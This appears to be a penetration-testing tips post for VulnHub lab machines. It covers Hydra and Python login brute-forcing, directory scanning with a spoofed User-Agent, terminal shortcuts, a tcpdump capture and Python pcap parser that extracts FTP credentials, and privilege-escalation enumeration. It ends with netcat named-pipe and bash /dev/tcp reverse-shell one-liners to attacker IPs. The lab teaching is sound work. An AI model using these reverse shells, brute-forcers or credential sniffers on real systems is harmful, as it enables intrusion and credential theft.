
Brute Forcing Forms with Hydra

Hydra can brute-force more than network services such as SSH or FTP: its http-post-form module submits a web login form with each user/password pair and decides success from the response. Check the failure string against a known-bad login before starting a long run; if the application answers a wrong password with some other text, every guess is reported as a hit.

# -L user list, -P password list, -s port; the module argument is
# path:POST body:failure condition, so F=Failed means any response
# containing "Failed" counts as a wrong guess
hydra -v -L mypusers -P /usr/share/wordlists/rockyou.txt -s 8000 127.0.0.1 http-post-form "/login:username=^USER^&password=^PASS^:F=Failed"
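To make the F=Failed rule concrete, here is a hand-rolled version of what the http-post-form module does. This is an added example, not code from the original post or from the Hydra project: it starts a throw-away login endpoint on 127.0.0.1 (a stand-in for the target), and the /login path, the username/password field names and the "Failed" marker mirror the command above, while the user list, password list and valid credential pair are made up.

```python
# Added example (not from the original post): a hand-rolled version of what
# hydra's http-post-form module does, so the "F=Failed" logic is visible.
# A throw-away login endpoint is started on 127.0.0.1 for the demonstration;
# the /login path, field names and the "Failed" marker mirror the hydra
# command above, while the valid credential pair is made up.
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

VALID_CREDENTIALS = {"tom": "Summ3r2020!"}   # constructed, for the stub only


class _LoginHandler(BaseHTTPRequestHandler):
    """Stub of the target: answers POST /login with 'Login Failed' unless the pair is right."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if self.path == "/login" and VALID_CREDENTIALS.get(user) == password:
            body = b"Welcome back, " + user.encode()
        else:
            body = b"Login Failed"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *_):   # keep the demo output quiet
        pass


def start_stub_server():
    """Start the stub on an ephemeral port; returns the server (call .shutdown() when done)."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), _LoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def login_succeeds(url, user, password, fail_marker):
    """One attempt. Mirrors hydra's F= rule: success means the failure string is absent.

    A non-200 reply (lockout page, 500 from a crashed app) is treated as a failure
    rather than a hit, which plain marker matching on its own would misreport.
    """
    data = urllib.parse.urlencode({"username": user, "password": password}).encode()
    try:
        with urllib.request.urlopen(url, data=data, timeout=5) as resp:
            return fail_marker.encode() not in resp.read()
    except urllib.error.HTTPError:
        return False


def brute_force(url, users, passwords, fail_marker="Failed"):
    """Try every user/password pair; return (user, password, attempts) on the first hit, else None."""
    attempts = 0
    for user in users:
        for password in passwords:
            attempts += 1
            if login_succeeds(url, user, password, fail_marker):
                return user, password, attempts
    return None


if __name__ == "__main__":
    server = start_stub_server()
    url = f"http://127.0.0.1:{server.server_address[1]}/login"
    users = ["alice", "tom"]                            # stands in for -L mypusers
    passwords = ["password", "123456", "Summ3r2020!"]   # stands in for -P rockyou.txt
    print(brute_force(url, users, passwords))           # ('tom', 'Summ3r2020!', 6)
    server.shutdown()
```

The `HTTPError` branch is the part worth copying: a failure-string check alone treats any unexpected page (an account-lockout notice, a 500 from a crashed backend) as a valid login, which is the usual cause of a hydra run that "finds" dozens of passwords.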

Dirb/DirBuster not returning anything? Change the User-Agent.

Some applications filter requests by User-Agent so that the default header sent by scanning tools is rejected. In this example I was using the VulnHub Node VM and was getting no responses from Dirb at all, because the application blocks the User-Agent that DirBuster sends; supplying a browser User-Agent with -a makes the scan work.

# the Node app blocks DirBuster's default User-Agent, so send a browser one;
# put the wordlist directly after the URL, as dirb's usage expects
# (dirb <url_base> [<wordlist_file(s)>] [options])
dirb http://192.168.0.32:3000/ /usr/share/wordlists/dirb/big.txt -a "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"

Shell Terminal Tricks

After acquiring a reverse shell you may find that commands like "clear" and "reset" do not work, which makes the shell awkward to interact with. The usual cause is that TERM is unset in the spawned shell; setting it fixes that with ease.

export TERM=xterm

# check what TERM is currently set to (set only displays it, it does not set it)
set | grep TERM

Sudo Bang Bang

If you just ran a command that should have been run with sudo in front of it, you can re-run that exact command by typing:

sudo !!

Terminal Shortcuts

This video really improved my game when it comes to the terminal.

(YouTube video Linux Shell – How to be FAST)

CTRL + A – moves the cursor to the beginning of the line
CTRL + C – sends SIGINT, cancelling the current command/application
CTRL + D – deletes the character under the cursor; on an empty line it sends EOF, which logs you out and closes your current terminal session
CTRL + K – deletes (kills) everything from the cursor to the end of the line
CTRL + L – clears the screen
CTRL + N – moves forward through the history (the opposite of CTRL + P)
CTRL + P – recalls the previous command from the history
CTRL + R – searches backwards through previous commands
CTRL + S – stops output to the screen; useful with long-running commands
CTRL + Q – resumes output to the screen after CTRL + S
CTRL + U – deletes from the cursor to the beginning of the line
CTRL + Y – yanks (pastes) the text last deleted with CTRL + K, CTRL + U or CTRL + W
CTRL + X, CTRL + E – opens the current command line in $EDITOR
CTRL + W – deletes the word before the cursor
CTRL + Z – suspends the foreground process; resume it with fg, or let it run in the background with bg
CTRL + ALT + BACKSPACE – kills the X server (where the binding is enabled), ending the graphical session
CTRL + SHIFT + Q – closes the current terminal window (terminal-emulator specific)

ALT + B – moves the cursor back one word
ALT + F – moves the cursor forward one word
ALT + . – inserts the last argument of the previous command

Not Getting Enough Results?

Try another tool. Each one has its own wordlists, defaults and parsing quirks, so one will sometimes show something another missed, and a missed detail can cost you the box. Here is a list of tools for each task.

Brute Forcing

Hydra, Burp Suite, wfuzz, wpscan (WordPress only), roll your own using Bash/Python/PowerShell

Directory and File Brute Forcing

Dirb, GoBuster, Dirstalk

Zip Password Cracking

john (convert the archive with zip2john first), fcrackzip

Privilege Escalation

If you’re stuck on finding a privilege escalation here are some things you could try.

Monitoring Internal Traffic

On a live server, sniffing traffic from a foothold would be a go-to move; on VulnHub machines the author sometimes replicates human behaviour by running scripts on a schedule, so you may capture FTP login credentials in the clear by monitoring the wire. Pull the capture file back to your machine and open it in Wireshark to look for them.

# display interfaces
tcpdump -D

# capture from interface eth0 into cap.pcap; timeout stops tcpdump after 200 seconds
timeout 200 tcpdump -w cap.pcap -i eth0
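Wireshark is the comfortable way to read the capture, but it helps to know what it is doing for you. The following is an added example, not code from the original post: a minimal pcap reader that walks the Ethernet/IPv4/TCP frames in a file such as cap.pcap and pulls USER/PASS commands off the FTP control channel, buffering per connection so a command split across two segments is still caught. The capture it runs on is constructed in code, so the addresses, ports and credentials are made up; pcapng and nanosecond-timestamp files are not handled.

```python
# Added example (not from the original post): a minimal pcap reader that pulls
# FTP USER/PASS commands out of a capture such as the one tcpdump -w writes.
# Only classic pcap with Ethernet/IPv4/TCP frames is handled; the sample capture
# below is constructed in code, so addresses, ports and credentials are made up.
import struct

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6


def tcp_segments(pcap):
    """Yield (src_ip, dst_ip, sport, dport, payload) for each TCP segment in a pcap."""
    magic = struct.unpack_from("<I", pcap, 0)[0]
    if magic == 0xA1B2C3D4:
        end = "<"          # little-endian file (what tcpdump writes on x86)
    elif magic == 0xD4C3B2A1:
        end = ">"          # big-endian file
    else:
        raise ValueError("not a classic pcap file")
    if struct.unpack_from(end + "I", pcap, 20)[0] != 1:   # linktype 1 = Ethernet
        raise ValueError("only Ethernet captures are handled")
    off = 24                                              # skip the global header
    while off + 16 <= len(pcap):
        incl_len = struct.unpack_from(end + "IIII", pcap, off)[2]
        off += 16
        frame = pcap[off:off + incl_len]
        off += incl_len
        if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != ETHERTYPE_IPV4:
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        if ip[9] != IPPROTO_TCP:
            continue
        total_len = struct.unpack_from("!H", ip, 2)[0]
        src = ".".join(str(b) for b in ip[12:16])
        dst = ".".join(str(b) for b in ip[16:20])
        tcp = ip[ihl:total_len]
        if len(tcp) < 20:
            continue
        sport, dport = struct.unpack_from("!HH", tcp, 0)
        data_off = (tcp[12] >> 4) * 4
        yield src, dst, sport, dport, tcp[data_off:]


def extract_ftp_credentials(pcap, ftp_port=21):
    """Return [(client_ip, server_ip, user, password), ...] from the FTP control channel.

    Payload is buffered per flow, so a command split across segments is still parsed.
    """
    buffers = {}   # flow -> bytes not yet terminated by CRLF
    users = {}     # flow -> last USER seen on that connection
    found = []
    for src, dst, sport, dport, payload in tcp_segments(pcap):
        if dport != ftp_port or not payload:
            continue   # only client -> server traffic carries USER/PASS
        flow = (src, sport, dst, dport)
        *lines, rest = (buffers.get(flow, b"") + payload).split(b"\r\n")
        buffers[flow] = rest
        for line in lines:
            cmd, _, arg = line.decode("latin-1").partition(" ")
            if cmd.upper() == "USER":
                users[flow] = arg
            elif cmd.upper() == "PASS" and flow in users:
                found.append((src, dst, users.pop(flow), arg))
    return found


# --- constructed sample capture (not a real recording) -------------------------
def _frame(src, dst, sport, dport, payload):
    """Build one Ethernet/IPv4/TCP frame; checksums stay zero (the parser ignores them)."""
    ip_len = 20 + 20 + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, ip_len, 0, 0, 64, IPPROTO_TCP, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 0x50, 0x18, 65535, 0, 0)
    return b"\xff" * 6 + b"\x00" * 6 + struct.pack("!H", ETHERTYPE_IPV4) + ip + tcp + payload


def build_sample_pcap():
    """A made-up FTP login where the PASS command arrives in two TCP segments."""
    client, server = "192.168.0.32", "192.168.0.10"
    frames = [
        _frame(client, server, 40122, 21, b"USER mark\r\n"),
        _frame(server, client, 21, 40122, b"331 Please specify the password.\r\n"),
        _frame(client, server, 40122, 21, b"PASS Summ3r"),     # command split across
        _frame(client, server, 40122, 21, b"2020!\r\n"),       # two segments
        _frame(server, client, 21, 40122, b"230 Login successful.\r\n"),
    ]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)   # global header
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1600000000 + i, 0, len(frame), len(frame)) + frame
    return out


if __name__ == "__main__":
    for client, server, user, password in extract_ftp_credentials(build_sample_pcap()):
        print(f"{client} -> {server}: {user} / {password}")
```

To run it against a real capture, replace `build_sample_pcap()` with `open("cap.pcap", "rb").read()`; the per-flow buffering is what keeps the credentials visible when the client's TCP stack splits a command, which a naive grep over the file would miss.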

LinEnum

https://github.com/rebootuser/LinEnum

If you have a shell and can run a script, pull this one onto the target and run it. It enumerates a large amount of information about the host: kernel and distribution, users, sudo rules, SUID files, cron jobs, writable paths and more.

Kernel Exploits

Most VulnHub privilege escalations turn on a misconfiguration rather than the kernel, but occasionally a kernel exploit is the intended path. The commands below identify the running kernel so you can look it up in Exploit-DB. Before running anything, remember that kernel exploits can crash the box, and you usually need a compiler on the target or a cross-compiled binary.

# how to find out information about the linux kernel
uname -a

cat /proc/version

hostnamectl | grep Kernel

Netcat with no -e option? Use a named pipe!

Because "-e" turns Netcat into an easy backdoor, many builds (for example the OpenBSD netcat shipped by Debian-based systems) do not include it. You can get around this with a named pipe: the shell reads its input from the pipe, its output is piped into Netcat, and whatever Netcat receives from your listener is written back into the pipe.

I learned this from Dot Dot Slash on the Node 1 Walkthrough

# -f so a missing pipe does not error; 192.168.0.23:443 is the attacker's listener
rm -f /tmp/nce; mkfifo /tmp/nce; cat /tmp/nce | /bin/sh -i 2>&1 | nc 192.168.0.23 443 > /tmp/nce
# or, if the target shell is bash, use its /dev/tcp pseudo-device instead of nc
bash -i >& /dev/tcp/192.168.1.69/443 0>&1